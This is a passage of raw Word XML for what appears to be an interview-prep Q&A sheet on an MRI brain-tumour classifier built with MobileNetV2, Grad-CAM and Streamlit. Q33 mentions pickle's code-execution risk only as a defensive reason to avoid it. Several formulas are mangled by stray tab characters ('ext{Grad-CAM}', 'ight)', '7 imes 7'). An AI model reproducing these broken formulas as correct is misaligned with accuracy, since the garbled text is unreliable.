          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. Our problem is multi-class classification where each MRI belongs to exactly one of four mutually exclusive classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>18. What optimizer was chosen?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Adam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an initial learning rate of $0.001$. Adam combines the benefits of AdaGrad (adaptive learning rates) and RMSProp (moving averages of squared gradients).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>19. What data augmentations did you apply, and why were they restricted to 5%?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Horizontal flips, 5% rotation (~18 degrees), and 5% zoom. We restricted rotation and zoom because cranial MRI scans are naturally aligned in a scanner head coil; extreme tilts or crops violate clinical plausibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>20. What is data leakage, and how did you verify your dataset was free of it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Data leakage occurs when test images are accidentally present in the training set, causing inflated test scores. We computed MD5 cryptographic hashes for all 7,200 images and confirmed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zero hash intersections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> between train and test splits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>21. What is `tf.data.AUTOTUNE`?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A TensorFlow setting that dynamically tunes buffer sizes at runtime to balance CPU prefetching and GPU/CPU consumption, preventing hardware stalls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>22. What was the empirical benefit of retraining on the full dataset?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test accuracy on the same 1,600 untouched scans jumped from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>82.19% to 86.12%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (+3.93%), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Meningioma recall surged from 63.5% to 78.5%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (+60 correctly identified tumor patients).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>23. What is the test recall for healthy brains (`notumor`)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>99.0%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (396 out of 400 healthy scans correctly recognized, with near-zero false alarms).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>24. What is the test recall for pituitary tumors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>99.25%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (397 out of 400 correctly classified). Sellar region tumors have distinct anatomical locations easily captured by MobileNetV2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>25. Which two classes exhibit the highest confusion?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Glioma and Meningioma. 77 test gliomas were classified as meningiomas because both can appear as contrast-enhancing mass lesions when the base feature extractor is frozen.</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Advanced Questions (26–35)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>26. What is Grad-CAM, and how does it work mathematically?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Grad-CAM computes the gradient of the winning class score $y^c$ with respect to the feature map activations $A^k$ of the last conv layer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$\alpha_k^c = \frac{1}{Z} \sum_{i} \sum_{j} \frac{\partial y^c}{\partial A_{i,j}^k}$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It then computes a weighted sum of the feature maps and applies a ReLU:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$L_{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Grad-CAM}}^c = </w:t>
        <w:tab/>
        <w:t>ext{ReLU}\left(\sum_k \alpha_k^c A^k</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ight)$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>27. Why must we tap the **last** convolutional layer for Grad-CAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because earlier conv layers only know about simple edges without semantic meaning, while dense layers have flattened away all spatial 2D coordinates. The last conv layer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>out_relu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, $7 </w:t>
        <w:tab/>
        <w:t>imes 7$) is the exact boundary where semantic understanding and 2D spatial coordinates coexist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>28. Why does Grad-CAM apply a ReLU at the end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Because we only care about features that have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>positive influence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on predicting the target tumor class. Features with negative gradients indicate evidence for *competing* classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>29. How does `tf.GradientTape` function in `compute_gradcam`?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It records forward-pass tensor operations inside its Python context. Calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tape.gradient(target, sources)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> traverses the recorded computational graph backward using reverse-mode automatic differentiation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>30. How is the 7x7 Grad-CAM heatmap mapped onto a 224x224 MRI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It is bilinearly upsampled to $224 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 224$, scaled to $[0, 255]$ uint8, converted to RGB thermal colors via OpenCV's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>COLORMAP_JET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, and blended with the original MRI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Overlay} = (1 - \alpha) \cdot </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Scan} + \alpha \cdot </w:t>
        <w:tab/>
        <w:t>ext{JetMap}$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>31. What is the purpose of `@st.cache_resource` in `app.py`?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It caches the loaded TensorFlow Keras model in memory across user sessions, preventing a costly 12 MB disk deserialization on every UI button click or slider interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>32. In what format is your model saved on disk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Native </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Keras v3 (`.keras`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a ZIP archive containing a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>config.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> model topology, HDF5 weight matrices, and metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>33. Why shouldn't Python's `pickle` be used to save deep learning models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pickle files allow arbitrary code execution during deserialization via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__reduce__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit. Loading an untrusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>model.pkl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows malicious shell command execution on hospital servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>34. How does Streamlit's architecture differ from a Flask + React setup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Streamlit runs frontend rendering and backend computation in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exact same Python process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. State changes trigger top-to-bottom re-execution of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, updating the DOM via WebSocket deltas without REST API endpoints or JSON overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>35. What is the difference between Fine-Tuning and Feature Extraction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Feature Extraction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base model is frozen (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>trainable = False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>); only custom head weights update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fine-Tuning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unfreezing the top $N$ layers of the base model and training with a very low learning rate ($1</w:t>
        <w:tab/>
        <w:t>ext{e-}5$) so filters adapt directly to brain MRI textures.</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Technical Follow-Up &amp; Limitations (36–42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>36. Why didn't you unfreeze MobileNetV2 from the very beginning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because backpropagating massive gradients from an uninitialized head destroys ImageNet pre-trained weights in the first epoch (catastrophic forgetting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>37. What happens if a user uploads a knee or chest X-ray?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the model has a closed-world assumption (Softmax across 4 classes), it will still output probabilities summing to 1.0, likely misclassifying it with low confidence. A production system must include an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Out-Of-Distribution (OOD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input rejection classifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>38. How would you handle 3D MRI volumes instead of 2D slices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
